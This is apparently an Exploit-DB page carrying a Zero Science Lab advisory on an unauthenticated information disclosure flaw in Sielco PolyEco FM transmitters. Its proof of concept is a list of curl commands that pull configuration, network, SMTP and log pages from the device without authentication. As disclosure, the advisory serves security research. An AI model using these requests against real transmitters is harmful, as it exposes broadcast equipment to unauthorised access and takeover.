
16 changes to exploits/shellcodes/ghdb InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS) Bludit 4.0.0-rc-2 - Account takeover Microsoft Windows 11 - 'cmd.exe' Denial of Service
67 lines
No EOL
2.4 KiB
Text
67 lines
No EOL
2.4 KiB
Text
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure
|
|
## Exploit Author: LiquidWorm
|
|
|
|
Vendor: Sielco S.r.l
|
|
Product web page: https://www.sielco.org
|
|
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
|
|
PolyEco1000 CPU:1.9.4 FPGA:10.19
|
|
PolyEco1000 CPU:1.9.3 FPGA:10.19
|
|
PolyEco500 CPU:1.7.0 FPGA:10.16
|
|
PolyEco300 CPU:2.0.2 FPGA:10.19
|
|
PolyEco300 CPU:2.0.0 FPGA:10.19
|
|
|
|
Summary: PolyEco is the innovative family of high-end digital
|
|
FM transmitters of Sielco. They are especially suited as high
|
|
performance power system exciters or compact low-mid power
|
|
transmitters. The same cabinet may in fact be fitted with 50,
|
|
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
|
|
1000).
|
|
|
|
All features can be controlled via the large touch-screen display
|
|
4.3" or remotely. Many advanced features are inside by default
|
|
in the basic version such as: stereo and RDS encoder, audio
|
|
change-over, remote-control via LAN and SNMP, "FFT" spectral
|
|
analysis of the audio sources, SFN synchronization and much more.
|
|
|
|
Desc: Sielco PolyEco is affected by an information disclosure
|
|
vulnerability due to improper access control enforcement. An
|
|
unauthenticated remote attacker can exploit this, via a specially
|
|
crafted request to gain access to sensitive information.
|
|
|
|
Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
Macedonian Information Security Research and Development Laboratory
|
|
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2023-5766
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php
|
|
|
|
|
|
26.01.2023
|
|
|
|
--
|
|
|
|
|
|
$ curl -s http://RADIOFM/factory.ssi
|
|
$ curl -s http://RADIOFM/rds.ssi
|
|
$ curl -s http://RADIOFM/ip.ssi
|
|
$ curl -s http://RADIOFM/alarm.ssi
|
|
$ curl -s http://RADIOFM/i2s.ssi
|
|
$ curl -s http://RADIOFM/time.ssi
|
|
$ curl -s http://RADIOFM/fft.ssi
|
|
$ curl -s http://RADIOFM/info.ssi
|
|
$ curl -s http://RADIOFM/status.ssi
|
|
$ curl -s http://RADIOFM/statusx.ssi
|
|
$ curl -s http://RADIOFM/audio.ssi
|
|
$ curl -s http://RADIOFM/smtp.ssi
|
|
$ curl -s http://RADIOFM/rf.ssi
|
|
$ curl -s http://RADIOFM/rfa.ssi
|
|
$ curl -s http://RADIOFM/ping.ssi
|
|
$ curl -s http://RADIOFM/lan.ssi
|
|
$ curl -s http://RADIOFM/kappa.ssi
|
|
$ curl -s http://RADIOFM/dbrt.ssi
|
|
$ curl -s http://RADIOFM/audiom.ssi
|
|
$ curl -s http://RADIOFM/log.ssi |